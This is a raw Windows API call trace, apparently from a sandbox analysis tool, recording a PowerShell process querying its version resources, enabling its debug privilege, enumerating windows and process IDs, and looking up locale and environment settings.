[0071.899] lstrcpyW (in: lpString1=0x204fc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
[0071.899] CoTaskMemFree (pv=0x204fc0)
[0071.899] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf8514, puLen=0x10d8c0) returned 1
[0071.899] lstrlenW (lpString="6.1.7601.17514") returned 14
[0071.899] CoTaskMemAlloc (cb=0x20) returned 0x20f510
[0071.899] lstrcpyW (in: lpString1=0x20f510, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0071.900] CoTaskMemFree (pv=0x20f510)
[0071.900] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf81bc, puLen=0x10d8c0) returned 1
[0071.900] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
[0071.900] CoTaskMemAlloc (cb=0x66) returned 0x19cbc0
[0071.900] lstrcpyW (in: lpString1=0x19cbc0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
[0071.900] CoTaskMemFree (pv=0x19cbc0)
[0071.900] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x0, puLen=0x10d8c0) returned 0
[0071.900] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x0, puLen=0x10d8c0) returned 0
[0071.900] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x0, puLen=0x10d8c0) returned 0
[0071.900] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10d898, puLen=0x10d890 | out: lplpBuffer=0x10d898*=0x2bf8164, puLen=0x10d890) returned 1
[0071.900] CoTaskMemAlloc (cb=0x204) returned 0x1c3a80
[0071.900] VerLanguageNameW (in: wLang=0x0, szLang=0x1c3a80, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
[0071.902] CoTaskMemFree (pv=0x1c3a80)
[0071.902] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\", lplpBuffer=0x10d8e8, puLen=0x10d8e0 | out: lplpBuffer=0x10d8e8*=0x2bf80f0, puLen=0x10d8e0) returned 1
[0071.905] GetCurrentProcessId () returned 0x664
[0071.938] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10c810 | out: lpLuid=0x10c810*(LowPart=0x14, HighPart=0)) returned 1
[0071.939] GetCurrentProcess () returned 0xffffffffffffffff
[0071.940] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x10c830 | out: TokenHandle=0x10c830*=0x2f0) returned 1
[0071.940] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2bfb940*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0071.956] CloseHandle (hObject=0x2f0) returned 1
[0071.960] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x2f0
[0071.966] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2bfb9a8, cb=0x200, lpcbNeeded=0x10d848 | out: lphModule=0x2bfb9a8, lpcbNeeded=0x10d848) returned 1
[0072.014] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13f630000, lpmodinfo=0x2bfbc18, cb=0x18 | out: lpmodinfo=0x2bfbc18*(lpBaseOfDll=0x13f630000, SizeOfImage=0x77000, EntryPoint=0x13f63c63c)) returned 1
[0072.014] CoTaskMemAlloc (cb=0x804) returned 0x21dbc0
[0072.014] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13f630000, lpBaseName=0x21dbc0, nSize=0x800 | out: lpBaseName="PoWErSHELL.Exe") returned 0xe
[0072.015] CoTaskMemFree (pv=0x21dbc0)
[0072.015] CoTaskMemAlloc (cb=0x804) returned 0x21dbc0
[0072.015] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13f630000, lpFilename=0x21dbc0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
[0072.015] CoTaskMemFree (pv=0x21dbc0)
[0072.016] CloseHandle (hObject=0x2f0) returned 1
[0072.021] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x664) returned 0x2f0
[0072.021] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x10d978 | out: lpExitCode=0x10d978*=0x103) returned 1
[0072.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bfb088, Length=0x20000, ResultLength=0x10d940 | out: SystemInformation=0x12bfb088, ResultLength=0x10d940*=0xfeb8) returned 0x0
[0072.080] EnumWindows (lpEnumFunc=0x27e66ac, lParam=0x0) returned 1
[0072.081] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x42c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x424
[0072.081] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x200f6, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.081] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.082] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x530
[0072.082] GetWindowThreadProcessId (in: hWnd=0x50096, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.082] GetWindowThreadProcessId (in: hWnd=0x1008e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.082] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x428
[0072.082] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x768
[0072.082] GetWindow (hWnd=0x10230, uCmd=0x4) returned 0x0
[0072.083] IsWindowVisible (hWnd=0x10230) returned 0
[0072.083] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x658
[0072.083] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x628
[0072.083] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x628
[0072.083] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x628
[0072.083] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbc4
[0072.083] GetWindowThreadProcessId (in: hWnd=0x5001c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbc4
[0072.083] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbcc
[0072.083] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbcc
[0072.083] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbcc
[0072.083] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbc4
[0072.083] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x9b4
[0072.083] GetWindowThreadProcessId (in: hWnd=0x301b8, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x9b4
[0072.083] GetWindowThreadProcessId (in: hWnd=0x301b2, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xa24
[0072.083] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x9b4
[0072.083] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x9b4
[0072.084] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x9b4
[0072.084] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x920
[0072.084] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x910
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x900
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8f0
[0072.084] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8e0
[0072.084] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8d0
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8c0
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8b0
[0072.084] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8a0
[0072.084] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x890
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x880
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x870
[0072.084] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x858
[0072.084] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x844
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x834
[0072.084] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x824
[0072.084] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x814
[0072.085] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x804
[0072.085] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xc8
[0072.085] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x2c8
[0072.085] GetWindowThreadProcessId (in: hWnd=0x50152, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x134
[0072.085] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x5dc
[0072.085] GetWindowThreadProcessId (in: hWnd=0x3014c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x404
[0072.085] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x42c
[0072.085] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x330
[0072.085] GetWindowThreadProcessId (in: hWnd=0x20136, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x42c
[0072.085] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x330
[0072.085] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x42c
[0072.085] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x404
[0072.085] GetWindowThreadProcessId (in: hWnd=0x200d2, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x404
[0072.085] GetWindowThreadProcessId (in: hWnd=0x200c2, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.085] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.085] GetWindowThreadProcessId (in: hWnd=0x200b2, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.085] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x4009e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x624
[0072.086] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x63c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x20110, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x69c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x650
[0072.086] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x684
[0072.086] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x530
[0072.086] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x61c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x50090, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x5d8
[0072.086] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.086] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.087] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x530
[0072.087] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x530
[0072.087] GetWindowThreadProcessId (in: hWnd=0x30040, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x504
[0072.087] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x524
[0072.087] GetWindowThreadProcessId (in: hWnd=0x100a6, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x5ec
[0072.087] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x530
[0072.087] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x424
[0072.087] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.087] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x55c
[0072.087] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xa10
[0072.087] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x980
[0072.087] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x978
[0072.087] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x628
[0072.087] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x628
[0072.087] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbcc
[0072.087] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbcc
[0072.087] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbc4
[0072.087] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xbc4
[0072.088] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x9b4
[0072.088] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x9b4
[0072.088] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x920
[0072.088] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x910
[0072.088] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x900
[0072.088] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8f0
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8e0
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8d0
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8c0
[0072.088] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8b0
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x8a0
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x890
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x880
[0072.088] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x870
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x858
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x844
[0072.088] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x834
[0072.089] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x824
[0072.089] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x814
[0072.089] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x804
[0072.089] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0xc8
[0072.089] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x2c8
[0072.089] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x134
[0072.089] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x5dc
[0072.089] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x330
[0072.089] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x42c
[0072.089] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x404
[0072.089] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x624
[0072.089] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x63c
[0072.089] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x69c
[0072.089] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x650
[0072.089] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x530
[0072.089] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x530
[0072.089] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x504
[0072.089] GetWindowThreadProcessId (in: hWnd=0x100a8, lpdwProcessId=0x10d6a0 | out: lpdwProcessId=0x10d6a0) returned 0x5ec
[0072.115] WerSetFlags () returned 0x0
[0072.186] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
[0072.187] CoTaskMemFree (pv=0x0)
[0072.187] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10da08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10da00 | out: pulNumLanguages=0x10da08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10da00) returned 1
[0072.187] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10da08, pwszLanguagesBuffer=0x2c1fee8, pcchLanguagesBuffer=0x10da00 | out: pulNumLanguages=0x10da08, pwszLanguagesBuffer=0x2c1fee8, pcchLanguagesBuffer=0x10da00) returned 1
[0072.190] CoTaskMemAlloc (cb=0x24) returned 0x20f300
[0072.190] GetUserDefaultLocaleName (in: lpLocaleName=0x20f300, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
[0072.191] CoTaskMemFree (pv=0x20f300)
[0072.203] CoTaskMemAlloc (cb=0x104) returned 0x21ec90
[0072.203] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.204] CoTaskMemFree (pv=0x21ec90)
[0072.208] CoTaskMemAlloc (cb=0x104) returned 0x21ec90
[0072.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.208] CoTaskMemFree (pv=0x21ec90)
[0072.212] CoTaskMemAlloc (cb=0x104) returned 0x21ec90
[0072.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.212] CoTaskMemFree (pv=0x21ec90)
[0072.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
